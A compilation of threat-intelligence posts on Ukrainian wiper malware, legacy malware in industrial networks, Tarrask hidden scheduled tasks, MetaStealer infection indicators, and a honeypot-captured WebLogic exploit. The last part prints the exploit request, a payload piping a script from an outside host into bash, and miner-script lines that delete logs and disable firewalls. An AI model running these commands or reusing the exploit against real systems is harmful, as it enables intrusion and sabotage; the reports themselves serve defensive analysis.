When comparing IsaacWiper to WhisperKill, the attackers’ priorities become clear. WhisperKill creators prioritized speed and number of affected files over ensuring the full drive is overwritten, since only 1 MB of each file was overwritten. On the other hand, IsaacWiper creators gave total priority to deliver the most effective wiper, no matter how long it takes to overwrite the full physical disk.

AcidRain

On the same day IsaacWiper was deployed, another wiper attacked Viasat KA-SAT modems in Ukraine, this time with a different wiper, named AcidRain by SentinelLABS. This wiper was particularly aimed at modems, probably to disrupt Internet access from Ukraine. This new wiper showed similarities to previously seen botnets targeting modems using VPNFilter. It was used in 2018, targeting vulnerabilities in several common router brands: Linksys, MikroTik, NETGEAR, and TP-Link. Exploiting vulnerabilities allowed the attackers to obtain Initial Access inside all types of networks, where the bot would search for Modbus traffic to identify infected systems with Industrial Control Systems (ICS).

The wiper used was the ELF MIPS wiper targeting Viasat KA-SAT modems, which aimed to firstly overwrite any file outside of the any common *nix installation: bin, boot, dev, lib, proc, sbin, sys, sur, etc. to then delete data from /dev/.

CaddyWiper

The first version of CaddyWiper was discovered by ESET researchers on 2022-03-14 when it was used against a Ukrainian bank. This new wiper variant does not have any significant code similarities to previous wipers. This sample specifically sets an exclusion to avoid infecting Domain Controllers in the infected system. Afterwards, it targets C:/Users and any additional attached drive all the way to letter Z:/ and zeroes all the files present in such folders/drives. Finally, the extended information of the physical drives is destroyed, including the MBR and partition entries.

A variant of CaddyWiper was used again on 2022-04-08 14:58 against high-voltage electrical substations in Ukraine. This latest version of the wiper was delivered together with Industroyer2, an evolution of Industroyer, which has the main functionn being to communicate with industrial equipment. In this case, the wiper was used with the purpose of slowing down the recovery process from the Industroyer2 attack and gaining back control of the ICS consoles, as well as covering the tracks of the attack. According to Welivesecurity, who have been cooperating with CERT-UA in this investigation, the Sandworm Team is behind this latest attack.

In this same attack against the energy station in Ukraine, other wiper samples for Linux and Solaris were observed by WeliveSecurity. These wipers leverage the shred command if present, otherwise they use the basic dd or rm commands to wipe the system.

DoubleZero wiper

On March 22, 2022 CERT-UA reported a new wiper used against their infrastructure and enterprises. Named DoubleZero, the wiper was distributed as a ZIP file containing an obfuscated .NET program. The wiper’s routine sets a hardcoded list of system directories, which are skipped during an initial wiping targeting user files. Afterwards, the skipped system directories are targeted and finally the registry hives: HKEY_LOCAL_MACHINE (containing the hives Sam, Security, Software and System), HKEY_CURRENT_USER and HKEY_USERS.

There are two wiping methods, both of which zero out the selected file.

doublezero wiper

Figure 5. DoubleZero first wiping function.

Conclusion

As we have seen in the examples above, the main objective of the attackers behind wipers is to destroy all possible data and render systems unbootable (if possible), potentially requiring a full system restore if backups aren’t available. These malware attacks can be as disruptive as ransomware attacks, but wipers are arguably worse since there is no potential escape door of a payment to recover the data.

There are plenty of ways to wipe systems. We’ve looked at 6 different wiper samples observed targeting Ukranian entities. These samples approach the attack in very different ways, and most of them occur faster than the time required to respond. For that reason, it is not effective to employ detection of wiper malware, as once they are in the system as it is already too late. The best approach against wipers is to prevent attacks by keeping systems up to date and by increasing cybersecurity awareness. In addition, consequences can be ameliorated by having periodic backup copies of key infrastructure available.

Associated indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the following OTX Pulses:

WhisperKill
HermeticWiper and IsaacWiper
AcidRain
CaddyWiper
DoubleZero

Please note, the pulses may include other activities related but out of the scope of the report.

TYPE

INDICATOR

DESCRIPTION

SHA256

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

WhisperKill (stage1.exe)

SHA256

dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78

WhisperKill (stage2.exe)

SHA256

0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da

HermeticWiper

SHA256

1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591

HermeticWiper

SHA256

13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033

IsaacWiper

SHA256

9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a

AcidRain

SHA256

47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6

AcidRain

SHA256

Fc0e6f2effbfa287217b8930ab55b7a77bb86dbd923c0e8150551627138c9caa

CaddyWiper

SHA256

7062403bccacc7c0b84d27987b204777f6078319c3f4caa361581825c1a94e87

Industroyer2

SHA256

3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe

DoubleZero

SHA256

30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a

DoubleZero

 

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0001: Initial Access

T1190: Exploit Public-Facing Application

TA0002: Execution

T1047: Windows Management Instrumentation
T1569: System Services

T1569.002: Service Execution

TA0008: Lateral Movement

T1021: Remote Services

T1021.002: SMB/Windows Admin Shares

TA0005: Defense Evasion

T1070: Indicator Removal on Host

T1070.004: File Deletion
T1070.001: Clear Windows Event Logs

T1112: Modify Registry
T1484: Domain Policy Modification

T1484.001: Group Policy Modification

TA0011: Command and Control

T1102: Web Service

T1102.003: One-Way Communication

TA0040: Impact

T1485: Data Destruction
T1499: Endpoint Denial of Service

TA0042: Resource Development

T1588: Obtain Capabilities

T1588.003: Code Signing Certificates

wiper-malware-overview-hero.jpg

With wiper malware becoming popular in cyberattacks, FortiGuard Labs provides a deep dive on the threat technique to help organizations understand it and implement better protections. Read our blog about wiper malware including tactics, techniques, and procedures (TTPs).
blogs?d=yIl2AUoC8zA

The Department of Energy, CISA, the FBI, and the NSA jointly issued an advisory describing a sophisticated piece of malware called Pipedream that’s designed to attack a wide range of industrial control systems. This is clearly from a government, but no attribution is given. There’s also no indication of how the malware was discovered. It seems not to have been used yet.

More information. News article.

Car-Factory-Professional-Male-Automotive

This post was written with contributions from IBM Security’s Sameer Koranne and Elias Andre Carabaguiaz Gonzalez.

Operational technology (OT) — the networks that control industrial control system processes — face a more complex challenge than their IT counterparts when it comes to updating operating systems and software to avoid known vulnerabilities. In some cases, implementation of a patch could lead to hours or days of costly downtime. In other cases, full mitigation would require net new purchases of potentially millions of dollars worth of machinery to replace already functional systems simply because they are timeworn.

It’s no secret OT systems face this conundrum — and it’s become increasingly obvious cyber criminals are aware of this weakness, too. While there’s no shortage of recent headlines decrying the vulnerability of these systems to the more sophisticated malware commonly used by threat actors today, those conversations have overlooked another potential — yet equally serious — threat to OT: older malware still floating in the ether.

This is malware for which most systems have been patched and protected against, immunizing large swaths of networks and effectively dropping the older malware from the radar of IT teams (and headlines). Two examples of this kind of older malware include Conficker and WannaCry.

While occurrences of these malware types plaguing OT environments are relatively rare, they do occur — and often leave organizations combating a threat that was largely forgotten.

WannaCry: The Scourge of 2017… and Beyond

The WannaCry ransomware outbreak was a watershed for cybersecurity professionals in 2017 — a moment in time many in this industry will never forget. The fast-spreading worm that leveraged the Eternal Blue exploit ended up affecting more than 200,000 devices in over 150 countries. From X-Force’s perspective, WannaCry is the ransomware type they have most commonly seen at organizations with OT networks since 2018 — and, occasionally, WannaCry will even migrate into OT portions of the network itself.

One example of WannaCry infecting an OT network is Taiwan Semiconductor Manufacturing Company (TSMC) in 2018. Despite having robust network segmentation and cybersecurity practices in place, human error led to a vendor installing a software update on the OT portion of the network using a machine unknowingly infected with WannaCry ransomware. Because the laptop used for the software installation had been patched and was using an up-to-date operating system, it was not susceptible to the ransomware — but the OT network, on the other hand, was very susceptible.

The WannaCry ransomware spread quickly across TSMC’s network and infected several systems, since the OT network included multiple unpatched Windows 7 systems. The ransomware affected sensitive semiconductor fabrication equipment, automated material handling systems, and human-machine interfaces. It also caused days of downtime estimated to cost the company $170 million. CC Wei, the CEO of the company, said in a statement, “We are surprised and shocked. We have installed tens of thousands of tools before, and this is the first time this happened.” As a result of the incident, the company implemented new automated processes that would be less likely than human error to miss a critical security step.

WannaCry continues to affect organizations with OT networks, although — thankfully — X-Force observes such incidents much less frequently today than they did in 2018 and 2019, as many organizations are able to apply patches or identify workarounds to more effectively insulate networks from WannaCry.

Enter Conficker: Continuing to Emerge in 2021

An old worm — even older than WannaCry — that X-Force has observed on OT networks in 2021, however, is Conficker. This worm emerged in late 2008 as threat actors quickly leveraged newly released vulnerabilities in Microsoft XP and 2000 operating systems. Conficker seeks to steal and leverage passwords and hijack devices running Windows to run as a botnet. Because the malware is a worm, it spreads automatically, without human intervention, and has continued to spread worldwide for well over a decade.

Conficker — sometimes with different names and variants — is still present in some systems today, including in OT environments. As with WannaCry, the presence of legacy technologies and obsolete operating systems — including Windows XP, Windows Server 2003, and proprietary protocols that are not updated or patched as often as their IT network counterparts — make these environments especially vulnerable to Conficker. In addition, many legacy systems have limited memory and processing power, further constraining administrators’ ability to insulate them from infections such as Conficker or WannaCry, as the system will not even support a simple antivirus software installation.

The Conficker worm is particularly effective against Windows XP machines, especially unpatched versions, which are common in OT environments. The fast-spreading nature of the Conficker worm can be a challenge for network engineers — once infected, every Windows machine connected to the network could be impacted in as little as one hour. Since many OT environments are built on 20- to 30-year-old designs, partially modified to have connectivity for ease of access, it provides the ideal environment for even the simplest malware, Conficker included.

From Conficker infections X-Force has observed, the worm is able to affect human machine interfaces (HMIs), which have transmitted network traffic initially alerting security staff of the infection. X-Force malware reverse engineering of the Conficker worm indicates that it exploits the MS08-067 vulnerability to initially infect the host. Fortunately, in some cases Conficker malware — even when present in OT environments — has not led to operational damage or product quality degradation. Of course, this may not be the case for all network architectures on which Conficker malware may appear.

Defending OT Networks from Old Malware: Lessons From the Trenches

Even though many OT environments are running obsolete software and network topographies, there are measures organizations can take to defend against older malware strains such as WannaCry and Conficker. Often, the highest priority in an OT environment is maximizing uptime, leaving little room for maintenance, re-design, updates and their associated downtime. Yet even within these confines, there are many measures organizations can take to decrease the opportunities for old malware to get onto, spread within, and negatively affect their network.

Some of these include:

1. Network segmentation: Micro-segment the networks within an OT environment. If different lines do not need to communicate with each other, there is no need to create and maintain a large network subnet for all systems. Improve reliability of systems by segregating those in smaller subnets and restricting traffic at boundaries. In addition, an industrial demilitarized zone (iDMZ) is your best ally for compartmentalization and network segmentation. Avoid dynamic host configuration protocol (DHCP) as much as possible; should you be required to use it, subnet it to the lowest possible net mask. Configure virtual local area networks (VLANs) if possible.

2. Know what you have: Systems older than 20 years probably do not have a good electronic record in a configuration management database (CMDB) and may be missing or have outdated network drawings. Reverse engineering this information during an incident is not productive, and ensuring assets and network information is maintained accurately can go a long way. Be aware of the IPs, MACs, operating systems, and software licenses in your asset inventory. Get to know your environment up to the revision date of your software. Make clear which users are allowed to log on to machines based on specific roles; if possible, link users to a machine’s serial number.

3. Harden legacy systems to maintain a secure configuration: Remove all unused users and revoke all unnecessary administrative privileges, remove all unused software, disable all unused ports (running a packet capture can help), and prohibit using these assets for personal use. Insecure configuration of endpoints can leave open vulnerabilities for exploitation by adversaries or self-propagating malware. Identify unused and unwanted applications and delete them to reduce the attack surface. Avoid proprietary protocols as much as possible, unless they are constantly updated; check for and use better, newer protocols that are standardized.

4. Continuous Vulnerability Management: A vulnerability management program allows organizations to reduce the likelihood of vulnerability exploitation and unauthorized network access by a malicious actor and is necessary to make informed vulnerability treatment decisions based on risk appetite and regulatory compliance requirements. All necessary security and safety relevant patches must be applied as soon as feasible. If it is not possible to patch the system, ensure other compensating security controls are implemented to reduce the risk. Identify the lowest demand times in a day or week and commit to having downtime and maintenance windows for patching and updating. Routinely check for advisories on ICS-CERT and note whether your vendors are impacted.

5. Reduce SMB Attack Surface: Both WannaCry and Conficker are known to exploit SMB. Server Message Block (SMB) is a network communication protocol used to provide shared access to services on a network, such as file shares and printers. Because of its prevalence in information technology environments, adversaries commonly use this protocol to move laterally within a compromised environment, interact with remote systems, deploy malware, and transfer files. Moreover, SMB can provide a convenient way to bypass Multi-Factor Authentication (MFA) and remotely execute code. To reduce the attack surface and the overall risk associated with SMB-based lateral movement, consider the following hardening measures:

Configure Windows firewall to DENY all inbound SMB communications to workstations. This control will disable inbound connections on TCP ports 139 and 445.
Audit server SMB requirements and explicitly DENY SMB inbound on servers that do not require the protocol as part of their functionality.
Consider disabling legacy versions of the SMB protocol and migrating business applications to SMB v3.1. This activity requires careful planning and risk evaluation due to its potential impact on business operations.

6. Avoid the use of Portable Media: Uncontrolled portable media significantly increase the risks to the legacy OT environments, as OT systems may not have the latest security patches to defend against newer attack methodologies. Uncontrolled and unsecured allowance of portable media can expose an OT network to exploits and unplanned outages and downtime.

Have a security policy for secure use of portable media in OT environments.
Ideally, strictly prohibit use of USB flash drives. Should there be an absolute necessity of using one, designate a single USB stick for any maintenance and re-format it every time you use it.
Implement processes and technical controls that adequately support the security policy requirements. Controls may include, but are not limited to the following:
Every use of the device is documented in the logbook
The devices are scanned on designated quarantine PCs to ensure robust AV scan before using on OT endpoints. Ensure that anti-malware software is configured to automatically scan portable media
Control the number of portable media devices approved to be used in the environment
Disable autorun and autoplay auto-execute functionality for removable media.

Consider implementing Secure Media Exchange solutions such as Honeywell SMX or OPSWAT MetaDefender.

7. Rehearse Disaster Recovery (DR) and Incident Response (IR) scenarios regularly: DR plans should be documented, reliable backups should be available, and OT personnel must have an understanding and intimate knowledge of how the system should be recovered. IR and DR exercises should be conducted regularly to build the muscle memory needed for reliable recovery. Educate your team about imminent security threats and make them part of the security process. As part of any plan, have a direct line with your organization’s CSIRT: your best play is always a fast response and a transparent environment, so be organized and report everything.

8. Employ network monitoring solutions: Firewalls, Access Control Lists (ACLs) and Intrusion Prevention Systems (IPS) can assist in keeping a close eye on traffic traversing your network. Check for new nodes or machines communicating with suspicious assets. If you employ an intrusion detection system (IDS), ensure your signatures are up to date. Even when monitoring for old malware, new signatures appear every day.

While it isn’t common for an OT network to be infected with older malware like WannaCry or Conficker, documented cases do indeed exist, and they can leave costly destruction and even safety consequences in their wake.

To learn how X-Force can keep your network safer, download the X-Force for OT solution brief.

Read the 2022 X-Force Threat Intelligence Index Report to understand the latest OT Threats

The post Where Everything Old is New Again: Operational Technology and Ghost of Malware Past appeared first on Security Intelligence.

As Microsoft continues to track the high-priority state-sponsored threat actor HAFNIUM, new activity has been uncovered that leverages unpatched zero-day vulnerabilities as initial vectors. The Microsoft Detection and Response Team (DART) in collaboration with the Microsoft Threat Intelligence Center (MSTIC) identified a multi-stage attack targeting the Zoho Manage Engine Rest API authentication bypass vulnerability to initially implant a Godzilla web shell with similar properties detailed by the Unit42 team in a previous blog. Microsoft attributes this set of activity to HAFNIUM and not TG-3390/APT 27/IODINE as mentioned in the Unit42 blog.

Microsoft observed HAFNIUM from August 2021 to February 2022, target those in the telecommunication, internet service provider and data services sector, expanding on targeted sectors observed from their earlier operations conducted in Spring 2021.

Further investigation reveals forensic artifacts of the usage of Impacket tooling for lateral movement and execution and the discovery of a defense evasion malware called Tarrask that creates “hidden” scheduled tasks, and subsequent actions to remove the task attributes, to conceal the scheduled tasks from traditional means of identification.

The blog outlines the simplicity of the malware technique Tarrask uses, while highlighting that scheduled task abuse is a very common method of persistence and defense evasion—and an enticing one, at that. In this post, we will demonstrate how threat actors create scheduled tasks, how they cover their tracks, how the malware’s evasion techniques are used to maintain and ensure persistence on systems, and how to protect against this tactic.

Right on schedule: Maintaining persistence via scheduled tasks

Windows Task Scheduler is a service that allows users to perform automated tasks (scheduled tasks) on a chosen computer for legitimate administrative purposes (e.g., scheduled updates for browsers and other applications).

Throughout the course of our research, we’ve found that threat actors commonly make use of this service to maintain persistence within a Windows environment.

We’ve noted that the Tarrask malware generates several artifacts upon the creation of a scheduled task, whether using the Task Scheduler GUI or the schtasks command line utility. Profiling the use of either of these tools can aid investigators in tracking this persistence mechanism.

The following registry keys are created upon creation of a new task:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionScheduleTaskCacheTreeTASK_NAMEHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionScheduleTaskCacheTasks{GUID}

Screen grab of the Tarrask malware creating new registry keys and new scheduled tasks in Registry Editor.Figure 1. Tarrask malware creates new registry keys along with the creation of new scheduled tasks

The first subkey, created within the Tree path, matches the name of the scheduled task. The values created within it (Id, Index, and SD) contain metadata for task registration within the system. The second subkey, created within the Tasks path, is a GUID mapping to the Id value found in the Tree key. The values created within (Actions, Path, Triggers, etc.) contain the basic parameters necessary to facilitate execution of the task.

To demonstrate the value in the artifacts generated, shown in the following figures, we have created “My Special Task” which is set to execute the binary “C:WindowsSystem32calc.exe” on a regular interval.

Screen grab of the XML file and Registry EditorFigure 2. XML file matches name of the task

Similar information is also stored within an extensionless XML file created within C:WindowsSystem32Tasks, where the name of the file matches the name of the task. This is displayed in Figure 2, where we name the task “My Special Task” as an example.

Screen grab of an XML fileFigure 3. Extensionless XML file

Note that the “Actions” value stored within the Tasks{GUID} key points to the command line associated with the task. In Figure 2, there is a reference to “C:WindowsSystem32calc.exe” within the “Edit Binary Value” dialog, and there is a path referenced within the “<Command>” section in the extensionless XML file in Figure 3. The fact that this value is stored within two different locations can prove useful in recovering information regarding the task’s purpose in the event the threat actor has taken steps to cover their tracks.

Finally, there are two Windows event logs that record actions related to the creation and operation of Scheduled Tasks – Event ID 4698 within the Security.evtx log, and the Microsoft-Windows-TaskScheduler/Operational.evtx log.

Neither of these are audited by default and must be explicitly turned on by an administrator. Microsoft-Windows-TaskScheduler/Maintenance.evtx will exist by default, but only contains maintenance-related information for the Task Scheduler engine.

Effectively hiding scheduled tasks

In this scenario, the threat actor created a scheduled task named “WinUpdate” via HackTool:Win64/Tarrask in order to re-establish any dropped connections to their command and control (C&C) infrastructure. This resulted in the creation of the registry keys and values described in the earlier section, however, the threat actor deleted the SD value within the Tree registry path.

Screen grab of the deletion of a registry value in registry editorFigure 4. Deletion of the security descriptor (SD) value

In this context, SD refers to the Security Descriptor, which determines the users allowed to run the task. Interestingly, removal of this value results in the task “disappearing” from “schtasks /query” and Task Scheduler. The task is effectively hidden unless an examiner manually inspects the aforementioned registry paths.

Issuing a “reg delete” command to delete the SD value will result in an “Access Denied” error even when run from an elevated command prompt. Deletion must occur within the context of the SYSTEM user. It is for this reason that the Tarrask malware utilized token theft to obtain the security permissions associated with the lsass.exe process. Upon execution of the token theft, the malware could operate with the same privileges as LSASS, making the deletion possible.

Screengrab of a deleted SD in command promptFigure 5. Successful deletion of SD in Command Prompt

It is also important to note that the threat actor could have chosen to completely remove the two registry keys within Tree and Tasks, and the XML file created within C:WindowsSystem32Tasks. This would effectively remove the on-disk artifacts associated with the scheduled task, but the task would continue to run according to the defined triggers until the system rebooted, or until the associated svchost.exe process responsible for executing the task was terminated.

It’s possible the threat actor wanted to ensure persistence across reboots and therefore chose not to perform those steps, instead deleting only the SD value; however, we also speculate that the threat actor was unaware that the task would continue to run even after these components were removed.

Recommendations and cyber resilience guidance

Job or task schedulers are services that have been present in the Windows operating system for many years. The attacks we described signify how the threat actor HAFNIUM displays a unique understanding of the Windows subsystem and uses this expertise to mask activities on targeted endpoints to maintain persistence on affected systems and hide in plain sight.

As such, we recognize that scheduled tasks are an effective tool for adversaries to automate certain tasks while achieving persistence, which brings us to raising awareness about this oft-overlooked technique. We also want to bring attention to the fact that threat actors may utilize this method of evasion to maintain access to high value targets in a manner that will likely remain undetected. This could be especially problematic for systems that are infrequently rebooted (e.g., critical systems such as domain controllers, database servers, etc.).

The techniques used by the actor and described in this post can be mitigated or detected by adopting the following recommendations and security guidelines1:

Enumerate your Windows environment registry hives looking in the HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionScheduleTaskCacheTree registry hive and identify any scheduled tasks without SD (security descriptor) Value within the Task Key. Perform analysis on these tasks as needed.Modify your audit policy to identify Scheduled Tasks actions by enabling logging “TaskOperational” within Microsoft-Windows-TaskScheduler/Operational. Apply the recommended Microsoft audit policy settings suitable to your environment.Enable and centralize the following Task Scheduler logs. Even if the tasks are ‘hidden’, these logs track key events relating to them that could lead you to discovering a well-hidden persistence mechanismEvent ID 4698 within the Security.evtx logMicrosoft-Windows-TaskScheduler/Operational.evtx logThe threat actors in this campaign used hidden scheduled tasks to maintain access to critical assets exposed to the internet by regularly re-establishing outbound communications with C&C infrastructure. Remain vigilant and monitor uncommon behavior of your outbound communications by ensuring that monitoring and alerting for these connections from these critical Tier 0 and Tier 1 assets is in place.

Indicators of compromise (IOCs)

The following list provides IOCs observed during our investigation. We encourage customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

SHA256File NameDetails54660bd327c9b9d60a5b45cc59477c75b4a8e2266d988da8ed9956bcc95e6795winupdate.exe, date.exe, win.exeTarraska3baacffb7c74dc43bd4624a6abcd1c311e70a46b40dcc695b180556a9aa3bb2windowsvc.exe, winsrv.exe, WinSvc.exe, ScriptRun.exe, Unique.exe, ngcsvc.exe, ligolo_windows_amd64.exe, proxy.zip, wshqos.exe, cert.exe, ldaputility.exeLigolo7e0f350864fb919917914b380da8d9b218139f61ab5e9b28b41ab94c2477b16dCertCert.jsp, Cert0365.jspGodzilla web shell

Microsoft 365 Defender Detections

How customers can identify this in Microsoft 365 Defender:

Microsoft Defender Antivirus

Microsoft Defender for Endpoint on detects implants and components as the following:

HackTool:Win64/Tarrask!MSRHackTool:Win64/Ligolo!MSR

Microsoft Defender for Endpoint detects malicious behavior observed as the following:

Behavior:Win32/ScheduledTaskHide.A

Microsoft Sentinel Detections

Microsoft Sentinel customers can use the following detection queries to look for this activity:

Tarrask malware hash IOC: This query identifies a hash match related to Tarrask malware across various data sources.Scheduled Task Hide: This query uses Windows Security Events to detect attempts by malware to hide the scheduled task by deleting the SD (Security Descriptor) value. Removal of SD value results in the scheduled task “disappearing” from “schtasks /query” and Task Scheduler.Microsoft Defender AV Hits: This query looks for Microsoft Defender AV detections related to Tarrask malware using SecurityAlerts table. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins the DeviceInfo table to clearly connect other information such as Device group, IP, logged on users etc. This way, the Microsoft Sentinel user can have all the pertinent device info in one view for the alerts.

1 The technical information contained in this article is provided for general informational and educational purposes only and is not a substitute for professional advice. Accordingly, before taking any action based upon such information, we encourage you to consult with the appropriate professionals. We do not provide any kind of guarantee of a certain outcome or result based on the information provided. Therefore, the use or reliance of any information contained in this article is solely at your own risk.

The post Tarrask malware uses scheduled tasks for defense evasion appeared first on Microsoft Security Blog.

Introduction

Since Wednesday 2022-03-30, at least 16 samples of a specific Excel file have been submitted to VirusTotal.These malicious Excel files are distributed as email attachments.Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity from the EmergingThreats Pro (ETPRO) ruleset.This infection process uses data binaries to create the malicious EXE and DLL files used for the infection.The malware abuses legitimate services by Github and transfer.sh to host these data binaries.All URLs, domains, and IP addresses were still active for the infection approximately 3 hours before I posted this diary.

Shown above:  Flow chart for the MetaStealer infection chain reviewed in today’s diary.

Images from an infection

Shown above:  Screenshot from an email distributing the malicious Excel file.

Shown above:  Screenshot of the malicious Excel file.

Shown above:  Traffic from an infection on Tuesday 2022-04-05 filtered in Wireshark.

Shown above:  Alerts from the infection Security Onion using the Suricata and the ETPRO ruleset.

Shown above:  UAC alert generated by malicious EXE during the infection.

Shown above:  Malicious EXE file generated during the infection.

Shown above:  Malicious EXE persistent on the infected Windows host.

Indicators of Compromise (IOCs)

Traffic generated after enabling Excel macro:

hxxps://github[.]com/michel15P/1/raw/main/notice.ziphxxps://raw.githubusercontent[.]com/michel15P/1/main/notice.zipNote: File returned from the above URL is a data binary and not a zip archive

Traffic generated by persistent EXE created from the above binary:

port 80 – transfer[.]sh – GET /get/qT523D/Wlniornez_Dablvtrq.bmp              port 443 – hxxps://transfer[.]sh/get/qT523D/Wlniornez_Dablvtrq.bmp                                                  193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – GET /avast_update                                    193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – GET /api/client/new                                 193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – POST /tasks/get_worker

Alerts on traffic to 193.106.191[.]162 over TCP port 1775:

ETPRO MALWARE Win32/MetaStealer Related Activity (GET) sid: 2851362ETPRO MALWARE Win32/MetaStealer Related Activity (POST) sid: 2851363

Associated malware and artifacts:

SHA256 hash: 981247f5f23421e9ed736dd462801919fea2b60594a6ca0b6400ded463723a5e

File size: 88,069 bytesFile name: transfer_info2460.xlsFile description: Example of email attachment, an Excel file with macro for malwareSandbox analysis: https://app.any.run/tasks/02a6b252-5ea1-4f2b-96d3-4eb2eaec34ca

SHA256 hash: 81e77fb911c38ae18c268178492224fab7855dd6f78728ffedfff6b62d1279dc

File size: 2,828 bytesFile name: open.vbsFile location: same directory as the above Excel file or the user’s AppData/Local/Temp directoryFile description: After enabling macro, this VBS file is used to create the persistent EXENote: I could not find this file on my infected lab host

SHA256 hash: 8cfa23b5f47ee072d894ee98b1522e3b8acc84a6e9654b71f50536e74a3579a5

File size: 417,512 bytesFile location: hxxps://raw.githubusercontent[.]com/michel15P/1/main/notice.zipFile type: dataFile description: data binary retrieved by open.vbs used to persistent EXE (below)

SHA256 hash: f644bef519fc0243633d13f18c97c96d76b95b6f2cbad2a2507fb8177b7e4d1d

File size: 367,001,600 bytesFile location: C:Users[username]AppDataLocalTempnotice.exeFile location: C:Users[username]AppDataRoamingqwveqwveqw.exeFile description: Malware EXE persistent on the infected Windows hostNote: This binary is appended with more than 366 MB of zero byte fillerNote: Persistent through “Shell” value at HKCUSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon

SHA256 hash: 7641ae596b53c5de724101bd6df35c999c9616d93503bce0ffd30b1c0d041e3b

File size: 143,400 bytesFile description: Persistent malware EXE with most of the zero byte filler removed

SHA256 hash: fba945b78715297f922b585445c74a4d7663ea2436b8c32bcb0f4e24324d3b8b

File size: 716,288 bytesFile location: hxxps://transfer[.]sh/get/qT523D/Wlniornez_Dablvtrq.bmpFile type: dataFile description: Retrieved by persistent EXE, this binary is a Windows DLL file in reverse byte order

SHA256 hash: bf3b78329eccd049e04e248dd82417ce9a2bcaca021cda858affd04e513abe87

File size: 716,288 bytesFile description: Windows DLL file created by reserving the above binaryFile type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS WindowsRun method: loaded/run by persistent EXE

SHA256 hash: cb6254808d1685977499a75ed2c0f18b44d15720c480fb407035f3804016ed89

File size: 2,182,488 bytesFile location: hxxp://193.106.191[.]162:1775/avast_updateFile description: base64 text representing a Windows DLL file

SHA256 hash: 71e54b829631b93adc102824a4d3f99c804581ead8058b684df25f1c9039b738

File size: 1,636,864 bytesFile description: Windows DLL file converted from the above textFile type: PE32 executable (DLL) (console) Intel 80386, for MS WindowsRun method: unknown, loaded/run by persistent EXE or previous DLL loaded/run by persistent EXE

Final words

Each time I rebooted my infected Windows host, the persistent EXE generated traffic to the same transfer.sh URL and re-started the infection process without the Github traffic.

Malware associated with this infection was first submitted to VT on Wednesday 2022-03-30.  ETPRO signatures identifying HTTP traffic generated by this malware as MetaStealer were released on Friday 2022-04-01.

My thanks to Security Onion, Proofpoint’s EmergingThreats team, and Didier Stevens’ tools for reversing binaries. These three resources were a big help in my analysis for this diary.

A pcap of the infection traffic and the associated malware/artifacts can be found here.

—Brad Duncanbrad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

large.png

Looking through my honeypot logs for some Spring4Shell exploits (I didn’t find anything interesting), I came across this attempt to exploit an older WebLogic vulnerability (likely %%cve:2020-14882%% or %%cve:2020-14883%%). The exploit itself is “run of the mill,” but the script downloaded is going through an excessively long list of competitors to disable and disabled cloud monitoring tools, likely to make detecting and response more difficult. Many organizations will not notice that they do not receive any more alerts 😉

The initial exploit came from %%ip:109.237.96.124%% (IP is in Russia and has been scanning for port 7001 for a couple of weeks now):

POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: [redcated]:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
 like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 148
Connection: Keep-Alive

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://185.231.153.4/wb.xml”)

It is pretty apparent from the above code that the exploit attempts to download wb.xml from %%ip:185.231.153.4%% (another Russian IP. Appears not to be involved in any active scanning).

 <beans xmlns=”http://www.springframework.org/schema/beans” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:schemaLocation=”http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd”>
    <bean id=”pb” class=”java.lang.ProcessBuilder” init-method=”start”>
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <value><![CDATA[(curl -s 185.231.153.4/wb.sh||wget -q -O- 185.231.153.4/wb.sh)|bash]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

This leads us to wb.sh, downloaded from the same host. wb.sh is the actual script installing the miner and disabling the competition. I will not post the full script here as it is too long. But just samples from various parts. The SHA256 hash of wb.sh is ea8727980efe4be07bcbaf300f7e7af354589b81c1bf7ca474a19ac9dcc01b1b. 

It starts with disabling various typical security limits (note the changes to the /tmp directories. That is not super common)

touch /tmp/zzza
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F

[ and more… ]

Next, it uninstalls and kills the “aliyun-service.” Aliyun(Alibaba Cloud) installs by default various monitoring and security tools. The script downloads a tool to disable them.

if ps aux | grep -i ‘[a]liyun’; then
